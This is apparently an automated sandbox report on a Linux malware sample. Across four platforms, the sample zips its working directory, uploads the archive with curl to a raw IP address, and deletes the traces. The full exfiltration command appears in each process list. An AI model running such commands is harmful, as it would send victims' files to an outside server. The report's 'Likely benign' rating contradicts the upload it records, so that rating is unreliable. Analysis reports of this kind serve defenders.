Malware Analysis Report

2025-01-23 14:06

Sample ID 240828-r5graascqa
Target a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42
SHA256 a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42
Tags
antivm
score
4/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
4/10

SHA256

a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42

Threat Level: Likely benign

The file a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42 was found to be: Likely benign.

Malicious Activity Summary

antivm

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-28 14:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-28 14:46

Reported

2024-08-28 14:47

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

29s

Command Line

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ziiaT9mL /usr/bin/zip N/A
File opened for modification /tmp/.zip /usr/bin/zip N/A

Processes

/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

/usr/bin/zip

[zip -r .zip .]

/usr/bin/curl

[curl -s -o /dev/null -F method=data -F [email protected] http://81.19.137.179/api/index.php]

/bin/rm

[rm -rf ]

/bin/rm

[rm -rf .zip]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 81.19.137.179:80 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp

Files

/tmp/ziiaT9mL

MD5 89fc6aebde0ce86e80a940cecfab0d90
SHA1 108f7cf8a95df6e27803220f62ada7ed6482fcb9
SHA256 a75bbe50a82bed157b906dc6d2d95fddeed264f7a0ecaa04aadeddc5573ee962
SHA512 2315b8ec5b26a9695a773eb05fffa19145fa4061cc00abd99eec2ba314d45cdf6063b3144bd3f1c73548d14f1b7b9a39870c969d328606495cc3653aaa3f6879

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-28 14:46

Reported

2024-08-28 14:47

Platform

debian9-armhf-20240418-en

Max time kernel

1s

Max time network

3s

Command Line

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

/usr/bin/curl

[curl -s -o /dev/null -F method=data -F [email protected] http://81.19.137.179/api/index.php]

/bin/rm

[rm -rf ]

/bin/rm

[rm -rf .zip]

Network

Country Destination Domain Proto
NL 81.19.137.179:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-28 14:46

Reported

2024-08-28 14:47

Platform

debian9-mipsbe-20240611-en

Max time kernel

3s

Max time network

8s

Command Line

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

/usr/bin/curl

[curl -s -o /dev/null -F method=data -F [email protected] http://81.19.137.179/api/index.php]

/bin/rm

[rm -rf ]

/bin/rm

[rm -rf .zip]

Network

Country Destination Domain Proto
NL 81.19.137.179:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-28 14:46

Reported

2024-08-28 14:47

Platform

debian9-mipsel-20240418-en

Max time kernel

1s

Max time network

3s

Command Line

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42

[/tmp/a9285283ad735659895d1e33b1435f846804fc910280021d1a78af187acaff42]

/usr/bin/curl

[curl -s -o /dev/null -F method=data -F [email protected] http://81.19.137.179/api/index.php]

/bin/rm

[rm -rf ]

/bin/rm

[rm -rf .zip]

Network

Country Destination Domain Proto
NL 81.19.137.179:80 tcp

Files

N/A